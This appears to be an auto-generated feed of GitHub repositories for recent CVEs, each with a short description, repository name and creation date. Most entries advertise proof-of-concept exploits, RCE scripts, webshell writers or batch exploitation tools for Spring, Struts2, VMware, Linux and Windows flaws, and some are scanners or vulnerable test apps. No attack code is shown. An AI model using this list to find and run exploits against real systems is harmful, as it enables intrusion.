Spring Cloud Gateway Actuator API SpEL Code Injection (CVE-2022-22947) : twseptian/cve-2022-22947 create time: 2022-04-15T15:41:36Z

spring-cloud / spring-cloud-function,spring.cloud.function.routing-expression,RCE,0day,0-day,POC,EXP,CVE-2022-22963 : hktalent/spring-spel-0day-poc create time: 2022-03-26T01:40:04Z

Apache Struts2 S2-062远程代码执行漏洞(CVE-2021-31805) 支持批量扫描漏洞及漏洞利用 : jax7sec/S2-062 create time: 2022-04-15T11:30:26Z

Apache Struts2 S2-062远程代码执行漏洞(CVE-2021-31805) : Axx8/Struts2_S2-062_CVE-2021-31805 create time: 2022-04-15T10:28:29Z

no description : tufanturhan/CVE-2022-21971-Windows-Runtime-RCE create time: 2022-04-15T09:14:22Z

no description : tufanturhan/CVE-2022-0847-L-nux-PrivEsc create time: 2022-04-15T09:11:43Z

no description : MagicPiperSec/WPS-CVE-2022-24934 create time: 2022-04-15T09:08:00Z

no description : Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0331 create time: 2022-04-15T05:45:49Z

S2-062 (CVE-2021-31805) / S2-061 / S2-059 RCE : Wrin9/CVE-2021-31805 create time: 2022-04-15T04:23:44Z

CVE-2022-26809-RCE-EXP-POC : SeptS9119/CVE-2022-26809 create time: 2022-04-15T04:35:41Z

CVE-2022-26809-RCE-EXP : gitcomit/scemer2 create time: 2022-04-15T04:27:58Z

CVE-2022-26809-RCE-EXP : genieyou/CVE-2022-26809-RCE create time: 2022-04-15T04:13:22Z

远程代码执行S2-062 CVE-2021-31805验证POC : YanMu2020/s2-062 create time: 2022-04-15T01:50:14Z

CVE-2022-26809-RCE-EXP : SeptS9119/CVE-2022-26809-RCE create time: 2022-04-15T03:19:22Z

no description : 3SsFuck/CVE-2022-22954-POC create time: 2022-04-15T02:24:22Z

no description : SeptS0/CVE-2022-26809-RCE create time: 2022-04-14T23:42:17Z

Proof of Concept for exploiting VMware CVE-2022-22954 : tyleraharrison/VMware-CVE-2022-22954-Command-Injector create time: 2022-04-14T23:38:06Z

no description : Neimar47574/CVE-2022-24087 create time: 2022-04-14T16:56:08Z

no description : h0cksr/Fastjson--CVE-2017-18349- create time: 2022-04-14T16:31:46Z

no description : astyn9/Exploit-Medium-CVE-2021-41184 create time: 2022-04-14T13:42:54Z

no description : VVeakee/CVE-2017-12149 create time: 2022-04-14T13:24:51Z

Spring Cloud Function SPEL表达式注入漏洞(CVE-2022-22963) : k3rwin/spring-cloud-function-rce create time: 2022-04-14T11:10:50Z

CVE-2022-0185 exploit : featherL/CVE-2022-0185-exploit create time: 2022-04-14T10:46:04Z

no description : auduongxuan/CVE-2022-26809 create time: 2022-04-14T08:21:10Z

Remote Code Execution Exploit in the RPC Library : websecnl/CVE-2022-26809 create time: 2022-04-14T08:12:24Z

no description : mr-r3b00t/cve-2022-26809 create time: 2022-04-14T07:50:16Z

no description : sh-ubh/CVE-2018-1002105 create time: 2022-04-06T22:28:24Z

no description : VVeakee/CVE-2017-12149 create time: 2022-04-14T06:17:18Z

非常感谢yunxu1师傅提供的源码 : VVeakee/CVE-2017-12149 create time: 2022-04-14T03:30:54Z

The poc for CVE-2022-26809 RCE via RPC will be updated here. : sherlocksecurity/Microsoft-CVE-2022-26809 create time: 2022-04-14T03:41:32Z

no description : 0xkasra/CVE-2015-6967 create time: 2022-04-14T01:57:39Z

no description : 0xkasra/CVE-2017-5638 create time: 2022-04-14T02:48:22Z

PoC for CVE-2017-0075 : MarkusCarelli1/4B5F5F4Bp create time: 2022-04-14T02:16:31Z

no description : 0xkasra/CVE-2019-11447 create time: 2022-04-14T01:45:04Z

no description : AkuCyberSec/CVE-2017-8917-Joomla-370-SQL-Injection create time: 2022-04-13T19:44:19Z

PoC of CVE-2021-30731 : osy/WebcamViewer create time: 2022-04-13T06:13:24Z

CVE-2022-26809 PoC : f8al/CVE-2022-26809 create time: 2022-04-13T18:00:01Z

cve-2020-27955 : userxfan/cve-2020-27955 create time: 2022-04-13T17:16:48Z

CVE-2022-22965-PoC : jeremy-cxf/CVE-2022-22965-PoC create time: 2022-04-13T16:25:25Z

CVE-2022-22954 VMware Workspace ONE Access freemarker SSTI 漏洞 命令执行、批量检测脚本 : bewhale/CVE-2022-22954 create time: 2022-04-13T16:18:56Z

POC For CVE-2022-24483 : waleedassar/CVE-2022-24483 create time: 2022-04-12T18:04:29Z

spring4shell | CVE-2022-22965 : 0zvxr/CVE-2022-22965 create time: 2022-04-12T14:59:42Z

no description : Satheesh575555/system_bt_AOSP_10_r33_CVE-2021-0316 create time: 2022-04-13T12:51:46Z

Spring4Shell , Spring Framework RCE (CVE-2022-22965) , Burpsuite Plugin : Loneyers/Spring4Shell create time: 2022-04-11T12:37:58Z

no description : jfrog/jfrog-CVE-2022-24675 create time: 2022-04-13T09:05:33Z

Easy!Appointments < 1.4.3 - Unauthenticated PII (events) disclosure : Acceis/exploit-CVE-2022-0482 create time: 2022-04-13T09:00:44Z

VMware Workspace ONE Access and Identity Manager RCE via SSTI - Test script with in modes. : tunelko/CVE-2022-22954-PoC create time: 2022-04-13T08:52:15Z

not an exploit or a poc : killvxk/CVE-2022-26809 create time: 2022-04-13T07:23:46Z

VMware Workspace ONE Access远程代码执行漏洞 / Code By:Jun_sheng : Jun-5heng/CVE-2022-22954 create time: 2022-04-13T04:25:54Z

exploitation script tryhackme : Omaraitbenhaddi/-Spring4Shell-CVE-2022-22965- create time: 2022-04-13T00:15:55Z

PoC for CVE-2022-22954 - VMware Workspace ONE Access Freemarker Server-Side Template Injection : DrorDvash/CVE-2022-22954_VMware_PoC create time: 2022-04-12T21:15:27Z

no description : Wangsafz/cve-2017-0358.sh create time: 2022-04-12T14:44:13Z

no description : Chocapikk/CVE-2021-41773 create time: 2022-04-12T13:25:58Z

Scanner for network for CVE-2005-1794. : InitRoot/CVE-2005-1794Scanner create time: 2022-04-12T12:18:12Z

no description : Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0188 create time: 2022-04-12T12:25:22Z

no description : Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0688 create time: 2022-04-12T11:40:23Z

no description : Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0506 create time: 2022-04-12T11:02:00Z

no description : Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0600 create time: 2022-04-12T10:53:20Z

no description : Greenwolf/CVE-2022-1175 create time: 2022-04-12T11:00:56Z

no description : Greenwolf/CVE-2022-1162 create time: 2022-04-12T10:56:10Z

CVE-2022-22954 Açığı test etme : MSeymenD/CVE-2022-22954-Testi create time: 2022-04-12T09:35:17Z

no description : Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2020-0188 create time: 2022-04-12T08:55:40Z

no description : mumu2020629/-CVE-2022-22954-scanner create time: 2022-04-12T08:36:33Z

no description : lucksec/VMware-CVE-2022-22954 create time: 2022-04-12T06:35:10Z

提供单个或批量URL扫描是否存在CVE-2022-22954功能 : axingde/CVE-2022-22954-POC create time: 2020-10-09T10:14:50Z

CVE-2022-22954-VMware-RCE批量检测POC : chaosec2021/CVE-2022-22954-VMware-RCE create time: 2022-04-12T05:48:24Z

Local privilege escalation for OS X 10.10.5 via CVE-2016-1828. : zqlblingzs/bazad5 create time: 2022-04-12T04:20:14Z

CMPT733 Cybersecurity Lab II Project: GDB plugin for heap exploits inspired by CVE-2021-3156 : ypl6/heaplens create time: 2022-03-22T00:55:51Z

提供批量扫描URL以及执行命令功能。Workspace ONE Access 模板注入漏洞,可执行任意代码 : jax7sec/CVE-2022-22954 create time: 2022-04-12T04:14:36Z

TerraMaster TOS Unauthenticated Attacker Vulnerability CVE-2022-24990 : antx-code/CVE-2022-24990 create time: 2022-04-12T02:45:56Z

no description : aniqfakhrul/CVE-2022-22954 create time: 2022-04-11T23:21:50Z

CVE-2022-22954 is a server-side template injection vulnerability in the VMware Workspace ONE Access and Identity Manager : Vulnmachines/VMWare_CVE-2022-22954 create time: 2022-04-11T19:46:56Z

Exploiting CVE 2003-0264 with a buffer-overflow attack using Python3 : vaknin/SLMail5.5 create time: 2022-04-11T19:13:14Z

POC for VMWARE CVE-2022-22954 : sherlocksecurity/VMware-CVE-2022-22954 create time: 2022-04-11T13:59:23Z

no description : nanopathi/external_expat_AOSP10_r33_CVE-2022-22822toCVE-2022-22827 create time: 2022-04-11T13:57:41Z

Spring4Shell (CVE-2022-22965) : zer0yu/CVE-2022-22965 create time: 2022-04-01T12:37:32Z

no description : nanopathi/external_expat_AOSP10_r33_CVE-2021-46143 create time: 2022-04-11T12:29:22Z

no description : Satheesh575555/packages_apps_Settings_AOSP10_r33_CVE-2021-0333 create time: 2022-04-11T12:14:18Z

no description : nanopathi/external_expat_AOSP10_r33_CVE-2021-45960 create time: 2022-04-11T11:45:57Z

no description : nanopathi/framework_base_AOSP10_r33_CVE-2021-0314 create time: 2022-04-11T10:29:13Z

no description : Satheesh575555/frameworks_base_AOSP10_r33_CVE-2020-0439 create time: 2022-04-11T10:13:43Z

no description : Satheesh575555/system_bt_AOSP10_r33-CVE-2020-0138 create time: 2022-04-11T09:48:51Z

no description : Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0138 create time: 2022-04-11T09:20:41Z

no description : nanopathi/framework_base_AOSP10_r33_CVE-2021-0391 create time: 2022-04-11T08:57:29Z

burp被动扫描插件,目前只有CVE-2022-22947 : F6JO/Burp_VulPscan create time: 2022-04-11T06:19:24Z

CVE-2018-4185: iOS 11.2-11.2.6 kernel pointer disclosure introduced by Apple's Meltdown mitigation. : Giler2004/bazad1 create time: 2022-04-10T15:50:41Z

no description : nanopathi/system_bt_AOSP10_r33_CVE-2021-0507 create time: 2022-04-10T08:26:52Z

no description : f01965/CVE-2018-5146 create time: 2022-04-10T02:12:37Z

no description : f01965/CVE-2019-8014 create time: 2022-04-10T00:53:46Z

no description : persian64/CVE-2014-6271 create time: 2022-04-09T21:24:12Z

no description : persian64/CVE-2007-2447 create time: 2022-04-09T21:12:11Z

Script to check for Spring4Shell vulnerability : jrgdiaz/Spring4Shell-CVE-2022-22965.py create time: 2022-04-09T08:40:49Z

phpunit-shell | CVE_2017-9841 : 0zvxr/CVE-2017-9841 create time: 2022-04-09T11:12:58Z

no description : fransvanbuul/CVE-2022-22965-susceptibility create time: 2022-04-09T07:45:08Z

no description : mappl3/CVE-2019-0841 create time: 2022-04-09T05:19:25Z

Config files for my GitHub profile. : cveiga2008/cveiga2008 create time: 2022-04-08T22:15:46Z

Ported golang version of dirtycow.c : ArkAngeL43/CVE-2016-5195 create time: 2022-04-08T18:18:36Z

POC for the priv esc exploit in PKEXEC [ CVE -2021-4034 ] ( needs fixing, not the best) Converted into go : ArkAngeL43/CVE-2021-4034 create time: 2022-04-08T17:55:53Z

A DoS exploit for CVE-2022-21907 : polakow/CVE-2022-21907 create time: 2022-04-04T10:53:28Z

just using this for a some labs : Omega-Void/cve-2018-2574 create time: 2022-04-08T17:14:58Z

no description : CalumHutton/CVE-2022-22965-PoC_Payara create time: 2022-04-07T15:26:15Z

Add revert shell : cuongtop4598/CVE-2021-3129-Script create time: 2022-04-08T06:34:17Z

no description : Adash7/CVE-2021-42013 create time: 2022-04-08T06:07:37Z

no description : 0vercl0k/CVE-2022-28281 create time: 2022-04-08T02:49:09Z

no description : Will-Beninger/CVE-2022-22965_SpringShell create time: 2022-04-07T18:48:43Z

no description : tmatejicek/CVE-2015-1397 create time: 2022-04-07T17:01:22Z

Spring Cloud Config CVE-2019-3799|CVE_2020_5410 漏洞检测 : Corgizz/SpringCloud create time: 2022-04-07T14:51:52Z

no description : mr-r3bot/ManageEngine-CVE-2020-28653 create time: 2022-04-07T14:13:29Z

no description : nanopathi/frameworks_av_AOSP10_r33_CVE-2021-0520 create time: 2022-04-07T13:14:03Z

Spring4Shell PoC (CVE-2022-22965) : t3amj3ff/Spring4ShellPoC create time: 2022-04-07T09:13:11Z

no description : nanopathi/linux-4.19.72_CVE-2020-14381 create time: 2022-04-07T07:28:17Z

no description : persian64/CVE-2012-4869 create time: 2022-04-07T04:13:13Z

no description : persian64/CVE-2019-16113_ create time: 2022-04-07T03:57:15Z

CVE-2022-22965写入冰蝎webshell脚本 : 4nth0ny1130/spring4shell_behinder create time: 2022-04-07T03:50:14Z

CVE-2022-22965 pocsuite3 POC : wikiZ/springboot_CVE-2022-22965 create time: 2022-04-07T02:30:26Z

no description : hoaan1995/CVE-2018-9995 create time: 2022-04-07T00:37:26Z

Spring Framework RCE (CVE-2022-22965) Nmap (NSE) Checker (Non-Intrusive) : alt3kx/CVE-2022-22965 create time: 2022-04-07T00:08:16Z

springFramework_CVE-2022-22965_RCE简单利用 : liangyueliangyue/spring-core-rce create time: 2022-03-31T13:02:18Z

Unauthenticated RCE exploit for Fantec MWiD25-DS : code-byter/CVE-2022-28113 create time: 2022-03-26T21:39:00Z

no description : irgoncalves/irule-cve-2022-22965 create time: 2022-04-06T02:17:36Z

no description : vuongnv3389-sec/CVE-2019-20372 create time: 2022-04-06T16:53:28Z

[CVE-2010-2078] Exploit for UnrealIrcd 3.2.8.1 version (custom modification from a perl script simplifying all posible for bash scripting) : 0bfxgh0st-secondary/UnrealIrcd-3.2.8.1-cve-2010-2075-exploit create time: 2022-04-06T15:52:57Z

no description : netsectuna/CVE-2022-23909 create time: 2022-04-06T16:18:32Z

no description : vuongnv3389-sec/cve-2021-41773 create time: 2022-04-06T14:53:19Z

CVE-2022-26631 - Automatic Question Paper Generator v1.0 SQLi : Cyb3rR3ap3r/CVE-2022-26631 create time: 2022-04-06T15:05:47Z

Exploit a vulnerable Spring application with the Spring4Shell (CVE-2022-22965) Vulnerability. : FourCoreLabs/spring4shell-exploit-poc create time: 2022-03-31T15:01:12Z

Spring-Cloud-Spel-RCE : Ha0Liu/CVE-2022-22947 create time: 2022-04-06T09:40:05Z

The demo code showing the recent Spring4Shell RCE (CVE-2022-22965) : datawiza-inc/spring-rec-demo create time: 2022-04-06T04:17:51Z

RHSB-2022-002 Dirty Pipe - kernel arbitrary file manipulation - (CVE-2022-0847) : mhanief/dirtypipe create time: 2022-04-06T03:29:03Z

A Spring MVC or Spring WebFlux application running on JDK 9+ may be vulnerable to remote code execution (RCE) via data binding. The specific exploit requires the application to run on Tomcat as a WAR deployment. If the application is deployed as a Spring Boot executable jar, i.e. the default, it is not vulnerable to the exploit. However, the nature of the vulnerability is more general, and there may be other ways to exploit it. : LudovicPatho/CVE-2022-22965_Spring4Shell create time: 2022-04-05T20:34:36Z

CVE-2022-22963 research : SealPaPaPa/SpringCloudFunction-Research create time: 2022-04-05T17:06:55Z

Exploit Of Spring4Shell! : robiul-awal/CVE-2022-22965 create time: 2022-04-05T15:45:47Z

Spring Framework RCE Exploit : luoqianlin/CVE-2022-22965 create time: 2022-04-05T15:41:26Z

Spring4Shell is a critical RCE vulnerability in the Java Spring Framework and is one of three related vulnerabilities published on March 30 : xnderLAN/CVE-2022-22965 create time: 2022-04-05T15:12:15Z

no description : helGayhub233/CVE-2019-1653 create time: 2022-04-05T14:01:13Z

CVE-2022-22947 reproduce : aesm1p/CVE-2022-22947-POC-Reproduce create time: 2022-04-05T10:11:03Z

Spring has Confirmed the RCE in Spring Framework. The team has just published the statement along with the mitigation guides for the issue. Now, this vulnerability can be tracked as CVE-2022-22965. : Snip3R69/spring-shell-vuln create time: 2022-04-05T09:35:41Z

CVE-2020-24186的攻击脚本 : Sakura-501/CVE-2020-24186-exploit create time: 2022-04-05T08:31:56Z

CVE-2021-22555 exploit rewritten with pipe primitive : veritas501/CVE-2021-22555-PipeVersion create time: 2022-04-05T06:35:25Z

CVE-2022-0185 exploit rewritten with pipe primitive : veritas501/CVE-2022-0185-PipeVersion create time: 2022-04-05T07:48:35Z

CVE-2022-25636 exploit rewritten with pipe primitive : veritas501/CVE-2022-25636-PipeVersion create time: 2022-04-05T07:08:09Z

Exploitation of CVE-2022-22639 : jhftss/CVE-2022-22639 create time: 2022-03-17T06:16:54Z

CVE-2021-41773 | CVE-2021-42013 Exploiter Tool : CalfCrusher/Path-traversal-RCE-Apache-2.4.49-2.4.50-Exploit create time: 2022-04-04T22:07:21Z

Vulnerability scanner for Spring4Shell (CVE-2022-22965) : fracturelabs/go-scan-spring create time: 2022-04-04T21:01:26Z

Another spring4shell (Spring core RCE) POC : netcode/Spring4shell-CVE-2022-22965-POC create time: 2022-04-04T20:16:06Z

no description : yywing/cve-2022-0778 create time: 2022-04-04T18:09:06Z

Spring4Shell - CVE-2022-22965 : twseptian/cve-2022-22965 create time: 2022-04-04T16:43:03Z

POC to prove springshell CVE 2022-22965 : anair-it/springshell-vuln-POC create time: 2022-04-04T16:04:55Z

Spring4Shell vulnerability Proof of Concept : sunnyvale-it/CVE-2022-22965-PoC create time: 2022-04-04T13:44:39Z

Intentionally vulnerable Spring app to test CVE-2022-22965 : fracturelabs/spring4shell_victim create time: 2022-04-04T13:35:56Z

Proof-of-concept exploit for CVE-2016-1827 on OS X Yosemite. : superMan7912002/bazad3 create time: 2022-04-04T12:58:14Z

PowerShell port of CVE-2022-22965 vulnerability check by colincowie. : daniel0x00/Invoke-CVE-2022-22965-SafeCheck create time: 2022-04-04T10:37:27Z

no description : nanopathi/system_bt_AOSP10_r33_CVE-2021-0476 create time: 2022-04-04T07:35:45Z

no description : nanopathi/system_bt_AOSP10_r33_CVE-2020-0471 create time: 2022-04-04T06:41:12Z

no description : Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0377 create time: 2022-04-04T04:52:47Z

no description : Satheesh575555/system_bt_AOSP10_r33_CVE-2020-0413 create time: 2022-04-04T04:44:39Z

Nmap Spring4Shell NSE script for Spring Boot RCE (CVE-2022-22965) : gpiechnik2/nmap-spring4shell create time: 2022-04-03T01:27:28Z

Spring Framework RCE via Data Binding on JDK 9+ / spring4shell / CVE-2022-22965 : me2nuk/CVE-2022-22965 create time: 2022-04-01T13:35:01Z

no description : persian64/CVE-2018-7600 create time: 2022-04-03T22:45:53Z

Atlassian Jira XSS attack via Server Side Request Forgery (SSRF). : labsbots/CVE-2017-9506 create time: 2022-04-03T16:23:13Z

Apache forward request CVE : Kashkovsky/CVE-2021-40438 create time: 2022-04-03T15:24:24Z

no description : selectarget/laravel-CVE-2021-3129-EXP create time: 2022-04-03T14:06:29Z

Linux “Dirty Pipe” vulnerability gives unprivileged users root access : xnderLAN/CVE-2022-0847 create time: 2022-04-03T14:08:54Z

A Java application intentionally vulnerable to CVE-2021-44228 : aajuvonen/log4stdin create time: 2022-01-16T16:39:19Z

List of CVE-2020-* : mcdulltii/CVE-2020 create time: 2022-03-29T09:44:40Z

0day VirtualBox 6.1.2 Escape for RealWorld CTF 2020/2021 CVE-2021-2119 : shi10587s/Sauercloude create time: 2022-04-03T09:46:03Z

Environment for CVE-2021-41773 recreation. : bernardas/netsec-polygon create time: 2022-04-02T16:34:45Z

Spring Cloud Function SpEL - cve-2022-22963 : twseptian/cve-2022-22963 create time: 2022-04-03T06:45:51Z

Docker PoC for CVE-2022-22965 with Spring Boot version 2.6.5 : itsecurityco/CVE-2022-22965 create time: 2022-04-03T06:43:07Z

File upload to Remote Code Execution on Zenario CMS 9.0.54156 : minhnq22/CVE-2021-42171 create time: 2021-09-30T02:44:19Z

no description : zanezhub/CVE-2022-1015-1016 create time: 2022-04-02T22:49:40Z

no description : mwojterski/cve-2022-22965 create time: 2022-04-02T19:47:47Z

CVE-2022-23131漏洞利用工具开箱即用。 : Kazaf6s/CVE-2022-23131- create time: 2022-04-02T18:16:56Z

no description : asurti6783/SAP-memory-pipes-desynchronization-vulnerability-MPI-CVE-2022-22536 create time: 2022-04-02T16:12:56Z

DirtyPipe: Exploit for a new Linux vulnerability known as 'Dirty Pipe(CVE-2022-0847)' allows local users to gain root privileges. The vulnerability is tracked as CVE-2022-0847 and allows a non-privileged user to inject and overwrite data in read-only files, including SUID processes that run as root. : drapl0n/dirtypipe create time: 2022-04-02T13:49:03Z

no description : d0l0sapth3/cve20186574 create time: 2022-04-02T12:50:30Z

CVE-2022-22965\Spring-Core-RCE堪比关于 Apache Log4j2核弹级别漏洞exp的rce一键利用 : wjl110/CVE-2022-22965_Spring_Core_RCE create time: 2022-04-02T09:13:54Z

ActiveMQ系列漏洞探测利用工具,包括ActiveMQ 默认口令漏洞及ActiveMQ任意文件写入漏洞(CVE-2016-3088),支持批量探测利用。 : YutuSec/ActiveMQ_Crack create time: 2022-04-02T08:40:10Z

ShellShock interactive-shell exploit : akr3ch/CVE-2014-6271 create time: 2022-04-02T07:30:31Z

XSS via Host Header injection and Steal Password Reset Token of another user : comrade99/CVE-2022-24181 create time: 2022-03-22T08:06:53Z

spring框架RCE漏洞 CVE-2022-22965 : k3rwin/spring-core-rce create time: 2022-03-31T12:41:29Z

Local privilege escalation for OS X 10.10.5 via CVE-2016-1828. : SideGreenHand100/bazad5 create time: 2022-04-02T03:38:21Z

no description : pqlx/CVE-2022-1015 create time: 2022-04-02T03:27:11Z

no description : Wrin9/CVE-2022-22965 create time: 2022-04-02T03:17:48Z

Prova de conceito para a vulnerabilidade Polkit Pkexec: CVE-2021-4034(Pkexec Local Privilege Escalation) : Nosferatuvjr/PwnKit create time: 2022-04-01T19:51:18Z

no description : rwincey/spring4shell-CVE-2022-22965 create time: 2022-03-31T18:09:58Z

PoC for DoS vulnerability CVE-2021-37740 in firmware v3.0.3 of SCN-IP100.03 and SCN-IP000.03 by MDT. The bug has been fixed in firmware v3.0.4. : robertguetzkow/CVE-2021-37740 create time: 2022-04-01T18:07:42Z

no description : ZephrFish/CVE-2022-28251-POC create time: 2022-04-01T15:21:03Z

no description : nanopathi/external_libavc_AOSP10_r33_CVE-2021-0325 create time: 2022-04-01T14:11:58Z

CVE-2022-22965 : wshon/spring-framework-rce create time: 2022-04-01T13:46:55Z

Proof of Concept for CVE-2022-28251 : mubix/CVE-2022-28251-POC create time: 2022-04-01T13:35:48Z

Spring Cloud Function Vulnerable Application / CVE-2022-22963 : me2nuk/CVE-2022-22963 create time: 2022-03-31T14:32:14Z

CVE-2022-22965 Environment : Joe1sn/CVE-2022-22965 create time: 2022-04-01T12:18:29Z

no description : Satheesh575555/frameworks_av_AOSP10_r33_CVE-2020-0245 create time: 2022-04-01T11:04:45Z

no description : ShaikUsaf/frameworks_base_AOSP10_r33_CVE-2021-0334 create time: 2022-04-01T11:10:57Z

no description : nanopathi/linux-4.19.72_CVE-2021-32399 create time: 2022-04-01T10:29:20Z

no description : lcarea/CVE-2022-22965 create time: 2022-04-01T10:51:05Z

POC for CVE-2022-22963 : AayushmanThapaMagar/CVE-2022-22963 create time: 2022-04-01T10:47:56Z

no description : nanopathi/external_aac_AOSP10_r33_CVE-2020-0451 create time: 2022-04-01T09:20:38Z

Spring-Cloud-Gateway-CVE-2022-22947 : talentsec/Spring-Cloud-Gateway-CVE-2022-22947 create time: 2022-04-01T10:24:02Z

no description : helsecert/CVE-2022-22965 create time: 2022-04-01T10:16:24Z

Proof-of-Concept for CVE-2022-22965 exploitation on a self-contained .JAR file built with Maven. Based off https://github.com/Kirill89/CVE-2022-22963-PoC and https://github.com/Pizz33/Spring-Cloud-Function-SpEL : JDierberger1/CVE-2022-22965-JAR-SCA-POC create time: 2022-04-01T10:05:44Z

no description : Satheesh575555/frameworks_native_AOSP10_r33_CVE-2020-0392 create time: 2022-04-01T08:43:48Z

CVE-2021-42287/CVE-2021-42278 exploits in powershell : XiaoliChan/Invoke-sAMSpoofing create time: 2022-04-01T09:10:14Z

CVE-2022-22965 spring-core批量检测脚本 : chaosec2021/CVE-2022-22965-POC create time: 2022-04-01T08:37:00Z

批量无损检测 : tangxiaofeng7/CVE-2022-22965-Spring-CachedintrospectionResults-Rce create time: 2022-04-01T07:55:26Z

no description : nanopathi/frameworks_av_AOSP10_r33_CVE-2020-0241 create time: 2022-04-01T06:45:15Z

Spring-0day/CVE-2022-22965 : nu0l/CVE-2022-22965 create time: 2022-04-01T06:50:21Z

no description : Satheesh575555/frameworks_base_AOSP10_r33_CVE-2021-0652 create time: 2022-04-01T06:06:53Z

Showcase of overridding the Spring Framework version in older Spring Boot versions : snicoll-scratches/spring-boot-cve-2022-22965 create time: 2022-04-01T06:16:20Z

Presentation slides and supplementary material : stfnw/Debugging_Dirty_Pipe_CVE-2022-0847 create time: 2022-04-01T05:51:27Z

SpringFramework 远程代码执行漏洞CVE-2022-22965 : Axx8/SpringFramework_CVE-2022-22965_RCE create time: 2022-04-01T04:51:44Z

no description : Satheesh575555/System_bt_AOSP10-r33_CVE-2021-0397 create time: 2022-04-01T03:31:38Z

SpringFramework 远程代码执行漏洞CVE-2022-22965 : Axx8/SpringFramework_RCE_CVE-2022-22965 create time: 2022-04-01T04:15:25Z

BIGIP F5 : DDestinys/CVE-2021-22986 create time: 2022-04-01T02:02:33Z

CSDFASDFAESFAEAEF : l4fu/CVE-2022-3000 create time: 2022-04-01T02:59:03Z

CVE-2022-22965 EXP : likewhite/CVE-2022-22965 create time: 2022-04-01T02:25:46Z

Created after the release of CVE-2022-22965 and CVE-2022-22963. Bash script that detects Spring Framework occurrences in your projects and systems, allowing you to get insight on versions used. Unpacks JARs and analyzes their Manifest files. : mebibite/springhound create time: 2022-04-01T00:34:29Z

This includes CVE-2022-22963, a Spring SpEL / Expression Resource Access Vulnerability, as well as CVE-2022-22965, the spring-webmvc/spring-webflux RCE termed "SpringShell". : kh4sh3i/Spring-CVE create time: 2022-03-31T20:19:51Z

Test for cve-2021-3864 : walac/cve-2021-3864 create time: 2022-03-31T20:03:04Z

CVE-2022-22965 poc including reverse-shell support : viniciuspereiras/CVE-2022-22965-poc create time: 2022-03-31T19:19:52Z

Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit : reznok/Spring4Shell-POC create time: 2022-03-31T00:24:28Z

Spring4Shell Proof Of Concept/Information CVE-2022-22965 : BobTheShoplifter/Spring4Shell-POC create time: 2022-03-30T07:54:45Z

A Safer PoC for CVE-2022-22965 (Spring4Shell) : colincowie/Safer_PoC_CVE-2022-22965 create time: 2022-03-31T16:58:56Z

Vulnerabilidad RCE en Spring Framework via Data Binding on JDK 9+ : GuayoyoCyber/CVE-2022-22965 create time: 2022-03-31T16:14:36Z

no description : nanopathi/framework_base_AOSP10_r33_CVE-2021-0472 create time: 2022-03-31T15:28:01Z

Spring Framework RCE (Quick pentest notes) : alt3kx/CVE-2022-22965_PoC create time: 2022-03-31T15:43:06Z

Threat Intelligence on Zero-Day for Spring4Shell (CVE-2010-1622) : strainerart/Spring4Shell create time: 2022-03-31T14:25:54Z

A Proof-of-Concept (PoC) of the Spring Core RCE (Spring4Shell or CVE-2022-22963) in Bash (Linux). : exploitbin/CVE-2022-22963-Spring-Core-RCE create time: 2022-03-31T14:29:24Z

Spring Framework RCE (Quick pentest notes) : alt3kx/CVE-2022-22965_PoC create time: 2022-03-31T02:50:46Z

spring-core单个图形化利用工具,CVE-2022-22965及修复方案已出 : light-Life/CVE-2022-22965-GUItools create time: 2022-03-31T02:00:18Z

CVE-2022-22965 : about spring core rce : Mr-xn/spring-core-rce create time: 2022-03-30T14:35:00Z

no description : Kirill89/CVE-2022-22965-PoC create time: 2022-03-31T13:21:49Z

Exploit for Dirty-Pipe (CVE-2022-0847) : Nekoox/dirty-pipe create time: 2022-03-31T11:47:31Z

no description : puckiestyle/CVE-2022-22963 create time: 2022-03-31T11:14:46Z

no description : nanopathi/system_bt_AOSP10_r33_CVE-2020-0225 create time: 2022-03-31T10:23:25Z

no description : Satheesh575555/system_core_AOSP10_r33-CVE-2021-0330 create time: 2022-03-31T09:36:07Z

no description : webraybtl/CVE-2022-24934 create time: 2022-03-31T09:59:01Z

ColdFusion 8.0.1 - Arbitrary File Upload to RCE : persian64/CVE-2009-2265 create time: 2022-03-31T08:52:08Z

CVE-2010-1622 redux : DDuarte/springshell-rce-poc create time: 2022-03-31T08:06:46Z

no description : nanopathi/system_core_AOSP10_r33_CVE-2020-0421 create time: 2022-03-31T07:42:58Z

no description : nanopathi/system_bt_AOSP10_r33_CVE-2020-0463 create time: 2022-03-31T06:59:38Z

no description : Trinadh465/frameworks_native_CVE-2020-0226 create time: 2022-03-31T06:43:19Z

no description : Satheesh575555/System_bt_AOSP10-r33_CVE-2020-0449 create time: 2022-03-31T06:36:13Z

no description : DoTuan1/Reserch-CVE-2021-41773 create time: 2022-03-31T01:48:33Z

Spring Cloud Gateway RCE - CVE-2022-22947 : sagaryadav8742/springcloudRCE create time: 2022-03-30T23:33:43Z

try to determine if a host is vulnerable to SpringShell CVE‐2022‐22963 : jschauma/check-springshell create time: 2022-03-30T21:30:09Z

{ Spring Core 0day CVE-2022-22963 } : stevemats/Spring0DayCoreExploit create time: 2022-03-30T19:07:35Z

no description : Kirill89/CVE-2022-22963-PoC create time: 2022-03-30T17:37:35Z

Spring Core RCE CVE-2022-22963 : TheGejr/SpringShell create time: 2022-03-30T17:05:46Z

no description : darryk10/CVE-2022-22963 create time: 2022-03-30T15:49:32Z

A TLS server using a vendored fork of the Go TLS stack that has renegotation indication extension forcibly disabled. : johnwchadwick/cve-2009-3555-test-server create time: 2022-03-30T15:02:48Z

Python3 correction for SQLi code CMS Made Simple < 2.2.10 CVE: 2019-9053 : Matthsh/SQLi-correction create time: 2022-03-30T14:37:16Z

no description : spiderz0ne/CVE-2021-41773 create time: 2022-03-30T15:04:27Z

no description : nanopathi/framework_base_AOSP10_r33_CVE-2020-0391 create time: 2022-03-30T12:31:40Z

no description : ShaikUsaf/linux-4.19.72_CVE-2020-10757 create time: 2022-03-30T11:21:21Z

CVE-2022-22963 Spring-Cloud-Function-SpEL_RCE_exploit : RanDengShiFu/CVE-2022-22963 create time: 2022-03-30T11:36:42Z

